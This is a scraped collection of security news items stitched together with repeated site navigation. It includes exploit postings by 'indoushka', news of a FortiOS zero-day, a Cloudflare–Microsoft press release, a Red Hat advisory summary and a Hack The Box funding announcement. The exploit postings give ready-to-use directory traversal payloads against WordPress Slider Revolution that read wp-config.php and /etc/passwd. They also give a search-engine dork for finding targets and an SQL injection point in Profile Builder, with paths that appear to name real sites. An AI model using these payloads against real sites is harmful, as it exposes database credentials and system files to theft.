On newer macOS/iOS versions, entitlements in binary signature blobs are stored in the DER format. libCoreEntitlements.dylib is the userspace library for parsing and querying such entitlements. The kernel has its own version of this library inside the AppleMobileFileIntegrity module. libCoreEntitlements exposes several functions, such as, for example, to convert entitlements to a dictionary representation (e.g. CEQueryContextToCFDictionary) or to query a specific entitlement (CEContextQuery). Unfortunately, different functions traverse the DER structure in a subtly different way, which allows one API to see one set of entitlements and another API to see a different set of entitlements.

libCoreEntitlements CEContextQuery Arbitrary Entitlement Returns

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.9.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.9.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | b974aee33a66e29925be0ab29843b305b114f9a63e635ad75ca2c10d50af3474

Download | Favorite | View

**WordPress Slider Revolution 4.9.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.9.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/comunicacioninternacomuy/sitio/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.9.2 Directory Traversal

WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.3 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 83b023ff748b63a814933d6674398e32e4fb2ba5c520cc7997e01b2a23da875c

Download | Favorite | View

**WordPress Slider Revolution 4.1.3 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.3 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/sse.sg/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.3 Directory Traversal

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 4.1.2 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 4.1.2 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | d3b71e6cca26b526cd8c1ef3f9be1a645c838d5b2349fa4c8be240892908d108

Download | Favorite | View

**WordPress Slider Revolution 4.1.2 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 4.1.2 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index off revslider\backup                                                                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/langparkmedicalcentrecomau/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.phpGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 4.1.2 Directory Traversal

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

**WordPress Slider Revolution 3.0.8 Directory Traversal**

Posted Jan 13, 2023

Authored by indoushka

WordPress Slider Revolution plugin version 3.0.8 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 129c075ad285b288723e5f16312e3c90c87bccd10a3436f09ab9fdb5cfb03d53

Download | Favorite | View

**WordPress Slider Revolution 3.0.8 Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - Slider Revolution 3.0.8 Directory Traversal Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://www.sliderrevolution.com/                                                                                  |  | # Dork      : index of revslider\backup                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php[+] http://127.0.0.1/kalypsohotelcom/wp-admin/admin-ajax.php?action=revslider_show_image&img=../../../../../../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Slider Revolution 3.0.8 Directory Traversal

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

**WordPress Profile Builder 3.0.5 SQL Injection**

Posted Jan 13, 2023

Authored by indoushka

WordPress Profile Builder plugin version 3.0.5 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection

SHA-256 | dd2a00364eee556c9e3981aef19bd8de262365e971b4b9c66b65ec44ec825637

Download | Favorite | View

**WordPress Profile Builder 3.0.5 SQL Injection**

    ====================================================================================================================================| # Title     : WordPress profile builder 3.0.5 SQL Injection Vulnerability                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0.3(32-bit)                                             | | # Vendor    : https://fr.wordpress.org/plugins/profile-builder/                                                                  |  | # Dork      : "  "                                                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/member_detail.php?id=1772 <====| inject here[+] http://127.0.0.1/artscouncilofwilmingtonorg/members/login.php <====| LoginGreetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |                                                                                                                                      |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (79,868)
*   Arbitrary (15,737)
*   BBS (2,859)
*   Bypass (1,624)
*   CGI (1,018)
*   Code Execution (6,953)
*   Conference (674)
*   Cracker (840)
*   CSRF (3,294)
*   DoS (22,648)
*   Encryption (2,353)
*   Exploit (50,449)
*   File Inclusion (4,171)
*   File Upload (948)
*   Firewall (821)
*   Info Disclosure (2,667)
*   Intrusion Detection (868)
*   Java (2,913)
*   JavaScript (823)
*   Kernel (6,323)
*   Local (14,215)
*   Magazine (586)
*   Overflow (12,440)
*   Perl (1,418)
*   PHP (5,097)
*   Proof of Concept (2,293)
*   Protocol (3,439)
*   Python (1,468)
*   Remote (30,093)
*   Root (3,506)
*   Rootkit (501)
*   Ruby (595)
*   Scanner (1,633)
*   Security Tool (7,795)
*   Shell (3,111)
*   Shellcode (1,206)
*   Sniffer (888)
*   Spoof (2,172)
*   SQL Injection (16,119)
*   TCP (2,382)
*   Trojan (686)
*   UDP (878)
*   Virus (662)
*   Vulnerability (31,182)
*   Web (9,382)
*   Whitepaper (3,732)
*   x86 (946)
*   XSS (17,506)
*   Other

**File Archives**

*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   June 2022
*   May 2022
*   April 2022
*   March 2022
*   February 2022
*   Older

**Systems**

*   AIX (426)
*   Apple (1,936)
*   BSD (370)
*   CentOS (55)
*   Cisco (1,917)
*   Debian (6,649)
*   Fedora (1,690)
*   FreeBSD (1,242)
*   Gentoo (4,288)
*   HPUX (878)
*   iOS (334)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (44,427)
*   Mac OS X (684)
*   Mandriva (3,105)
*   NetBSD (255)
*   OpenBSD (479)
*   RedHat (12,511)
*   Slackware (941)
*   Solaris (1,607)
*   SUSE (1,444)
*   Ubuntu (8,231)
*   UNIX (9,177)
*   UnixWare (185)
*   Windows (6,512)
*   Other

WordPress Profile Builder 3.0.5 SQL Injection

A zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations.
"The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers said in a post-mortem analysis published this week.
The

Zero-Day / Incident Response

A zero-day vulnerability in FortiOS SSL-VPN that Fortinet addressed last month was exploited by unknown actors in attacks targeting the government and other large organizations.

"The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet researchers said in a post-mortem analysis published this week.

The attacks entailed the exploitation of CVE-2022-42475, a heap-based buffer overflow flaw that could enable an unauthenticated remote attacker to execute arbitrary code via specifically crafted requests.

The infection chain analyzed by the company shows that the end goal was to deploy a generic Linux implant modified for FortiOS that's equipped to compromise Fortinet's intrusion prevention system (IPS) software and establish connections with a remote server to download additional malware and execute commands.

Fortinet said it was unable to recover the payloads used in the subsequent stages of the attacks. It did not disclose when the intrusions took place.

In addition, the modus operandi reveals the use of obfuscation to thwart analysis as well as "advanced capabilities" to manipulate FortiOS logging and terminate logging processes to remain undetected.

"It searches for elog files, which are logs of events in FortiOS," the researchers said. "After decompressing them in memory, it searches for a string the attacker specifies, deletes it, and reconstructs the logs."

The network security company also noted that the exploit requires a "deep understanding of FortiOS and the underlying hardware" and that the threat actor possesses skills to reverse engineer different parts of FortiOS.

"The discovered Windows sample attributed to the attacker displayed artifacts of having been compiled on a machine in the UTC+8 timezone, which includes Australia, China, Russia, Singapore, and other Eastern Asian countries," it added.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

FortiOS Flaw Exploited as Zero-Day in Attacks on Government and Organizations

**SAN FRANCISCO -- (****BUSINESS WIRE****) --** Cloudflare, Inc. (NYSE: NET), the security, performance, and reliability company helping to build a better Internet, today announced an expansion of its relationship with Microsoft to help customers easily deploy, automate, and enhance their organization’s Zero Trust security.

Working from anywhere is more common than ever, and critical applications have moved to the cloud—no longer residing inside an office protected by a secure perimeter. This fundamental shift in where and how people work has caused enterprises to rethink legacy tools and abandon the traditional castle-and-moat approach to security, looking towards Zero Trust instead. As CIOs continue to navigate this paradigm shift, Cloudflare has developed a new set of integrations with Microsoft to help organizations on this journey. Now, mutual customers can seamlessly deploy Zero Trust security tools in minutes, with no complex code changes, and add industry-first features, such as Cloudflare’s Remote Browser Isolation technology.

"When I speak with CIOs, I continue to hear that their number one concern remains security, closely followed by adapting to the new hybrid world,” said Matthew Prince, CEO and co-founder at Cloudflare. “We want to make it easier than ever for IT leaders to deploy Zero Trust security across the enterprise and keep users safe wherever they are working from. I’m thrilled that we are deepening our integration with Microsoft so we can help our joint customers easily deploy Zero Trust security across some of the most used applications in the workplace.”

Through these new integrations, Cloudflare now provides a comprehensive identity driven approach to protect applications, users, devices and networks from attacks. These integrations pair Microsoft Identity solutions and Cloudflare network security tools to create a quality Zero Trust offering.

“A cloud-native Zero Trust security model has become an absolute necessity as enterprises continue to adopt a cloud-first strategy,” said Joy Chik, President, Identity and Network Access, Microsoft. “Cloudflare has developed robust product integrations with Microsoft to help security and IT leaders prevent attacks proactively, dynamically control policy and risk, and increase automation in alignment with Zero Trust best practices.”

Cloudflare and Microsoft Azure Active Directory (Azure AD) customers can now:

*   **Deploy Zero Trust Security without changing one line of code:** Now joint customers can choose to define specific rules in either Azure AD or in Cloudflare Access i.e. which users can access specific applications based on various factors such as user risk level, device platform, location, etc. and enforce across both products without changing a line of code.
*   **Isolate high-risk users automatically with industry leading browser isolation technology:** By integrating Cloudflare’s Remote Browser Isolation with Azure AD, high-risk users, such as temporary employees, are contained proactively in a remote browser session for added security.
*   **Save IT teams hundreds of hours of manual work:** Cloudflare Access will use the System for Cross-Domain Identity Management (SCIM) to directly integrate with Azure AD. Groups are automatically synced across Cloudflare and Azure Active Directory platforms and groups, saving hundreds of hours of manual work from IT teams.
*   **Keep sensitive Government data off of the public Internet:** By connecting Azure Government Cloud to Cloudflare’s global network via the Secure Hybrid Access (SHA) program, Government customers (‘GCC’) will be able to keep sensitive traffic secure by staying off of the public Internet. Additionally, Government customers (‘GCC’) will be able to define and enforce granular rules defining who can access what using the joint solution from the dashboard without any code changes.

Cloudflare has worked with Microsoft since 2018 to provide mutual customers with an improved Internet experience by securing web applications and safeguarding employees with identity and device protections. Cloudflare’s deep integrations across Microsoft 365 and Azure have supported many of the largest Fortune 500 companies on their Zero Trust journey, enabling customers to simply and easily support their security and performance needs. Most recently, Microsoft named Cloudflare the winner of its Security Software Innovator of the Year award.

To learn more about Cloudflare’s integration with Microsoft, check out the resources below:

*   Blog: Expanding our collaboration with Microsoft: proactive and automated Zero Trust security for customers
*   Joint reference architecture
*   Joint Zero Trust Webinar
*   Microsoft landing page
*   Docs: Enable SCIM on the Zero Trust dashboard
*   Docs: Use multiple Azure AD Conditional Access Policies with Access
*   Docs: Isolate Azure AD risky users

**About Cloudflare**

Cloudflare, Inc. (www.cloudflare.com / @cloudflare) is on a mission to help build a better Internet. Cloudflare’s suite of products protect and accelerate any Internet application online without adding hardware, installing software, or changing a line of code. Internet properties powered by Cloudflare have all web traffic routed through its intelligent global network, which gets smarter with every request. As a result, they see significant improvement in performance and a decrease in spam and other attacks. Cloudflare was awarded by Reuters Events for Global Responsible Business in 2020, named to Fast Company's Most Innovative Companies in 2021, and ranked among Newsweek's Top 100 Most Loved Workplaces in 2022.

**Forward-Looking Statements**

This press release contains forward-looking statements within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934, as amended, which statements involve substantial risks and uncertainties. In some cases, you can identify forward-looking statements because they contain words such as “may,” “will,” “should,” “expect,” “explore,” “plan,” “anticipate,” “could,” “intend,” “target,” “project,” “contemplate,” “believe,” “estimate,” “predict,” “potential,” or “continue,” or the negative of these words, or other similar terms or expressions that concern Cloudflare’s expectations, strategy, plans, or intentions. However, not all forward-looking statements contain these identifying words. Forward-looking statements expressed or implied in this press release include, but are not limited to, statements regarding Cloudflare’s partnership with Microsoft and the potential resulting benefits to Cloudflare customers, the potential benefits to customers of integrating Cloudflare and Microsoft products, the potential opportunity for Cloudflare to attract additional customers and to expand sales to existing customers through Cloudflare’s product integrations with Microsoft, the expected functionality and performance of Cloudflare’s Zero Trust and other products and technology, Cloudflare’s technological development, future operations, growth, initiatives, or strategies, and comments made by Cloudflare’s CEO and others. Actual results could differ materially from those stated or implied in forward-looking statements due to a number of factors, including but not limited to, risks detailed in Cloudflare’s filings with the Securities and Exchange Commission (SEC), including Cloudflare’s Quarterly Report on Form 10-Q filed on November 3, 2022, as well as other filings that Cloudflare may make from time to time with the SEC.

The forward-looking statements made in this press release relate only to events as of the date on which the statements are made. Cloudflare undertakes no obligation to update any forward-looking statements made in this press release to reflect events or circumstances after the date of this press release or to reflect new information or the occurrence of unanticipated events, except as required by law. Cloudflare may not actually achieve the plans, intentions, or expectations disclosed in Cloudflare’s forward-looking statements, and you should not place undue reliance on Cloudflare’s forward-looking statements.

Cloudflare Expands Relationship With Microsoft

Red Hat Security Advisory 2023-0099-01 - Kernel-based Virtual Machine offers a full virtualization solution for Linux on numerous hardware platforms. The virt:rhel module contains packages which provide user-space components used to run virtual machines using KVM. The packages also provide APIs for managing and interacting with the virtualized systems. Issues addressed include an out of bounds read vulnerability.

Red Hat Security Advisory 2023-0099-01

**New York and London, January 11, 2023 --** **Hack The Box**, a leading gamified continuous cybersecurity upskilling and talent assessment platform, today announces a **Series B investment round of $55 million** led by Carlyle, alongside Paladin Capital Group, Osage University Partners, Marathon Venture Capital, Brighteye Ventures, and Endeavor Catalyst Fund. The new investment will accelerate Hack The Box’s growth trajectory with a focus on further building out its category-defining “gamer-first” solutions offering. Hack The Box will also enhance its go-to-market function, doubling down on the company’s ongoing international expansion with strong commercial traction in the US, Europe and APAC.

Hack The Box has continued to attract significant funding interest due to its highly engaging adversarial cyber up- and reskilling solutions that are powered by ultra-realistic coding gameplay and thereby effectively advance the security readiness of Hack The Box’s rising number of blue-chip enterprise and government customers. Chief Information Security Officers and other senior cybersecurity decision-makers increasingly turn to Hack The Box to assess how secure their organizations look like from an attacker’s perspective and address the weakest link in cyber - the human element - through a performance-driven and thus highly transparent evaluation of in-house and external cyber talent.  

Tripling in size over the last two years, Hack The Box has the largest global hacking community with more than 1.7 million platform members. With its thriving community being at the heart of the company, Hack The Box will continue to invest heavily in R&D. The company will execute against a product roadmap that entails top-notch content releases and groundbreaking features, making Hack The Box the ultimate reference point for cybersecurity professionals of all backgrounds, skill levels, and industries, allowing them to keep pace with the rapidly evolving cyber technology and threat landscape. 

Hack The Box offers a superior 360°platform that not only enables individuals, businesses, government institutions and universities to level up their offensive and defensive security skills, but also provides access to job opportunities in cybersecurity, thus addressing the industry’s serious talent shortage. Providing mind-triggering, hands-on, and highly entertaining learning content that mimics real-world threat scenarios and features the latest up-to-date attack techniques and methods, Hack The Box is setting new standards in cybersecurity expertise.

“Our mission is to create and connect cyber-ready humans and organizations through highly engaging hacking experiences that cultivate out-of-the-box thinking. The game in cyber has changed with defensive, reactive and recovery postures not being fit-for-purpose in the face of an ever-increasing and ever-evolving wave of sophisticated attacks. A new proactive offensive & defensive approach is needed to take the fight to cybercriminals rather than waiting to be hit. From individual security professionals to companies, this means adopting a ‘hacker mindset’, learning to think and act like an attacker. This is the kind of mindset that we cultivate through Hack The Box”, **highlights Haris Pylarinos, Founder and CEO at Hack The Box**_._ 

**Constantin Boye, a Director at Carlyle, comments,**"The demands on security and IT professionals have never been greater. An industry-wide talent shortage and an exponentially growing number of cyber threats place great importance on professionals and organizations to maintain best-in-class security practices. Hack The Box is a pioneer in constantly providing fresh and curated training and upskilling content, in a fully gamified and intuitive environment, enabling individuals and organizations to tackle real-world hacking problems. We are excited for the next stage of Hack The Box’s evolution and are proud to be part of this journey."

**Gibb Witham, Senior Vice President at Paladin Capital Group, adds,**"With a vibrant community of 1.7 million registered security professionals and enthusiasts, Hack The Box is setting the bar for a new generation of product-led growth companies in the cybersecurity industry. We are thrilled to see Hack The Box becoming a vital partner for enterprises and governments in crafting security teams prepared for cyber attacks."

This Series B funding takes Hack The Box’s total amount of capital raised to date to $70 million, fortifying the company’s position within the global cybersecurity ecosystem.

Tag

#ios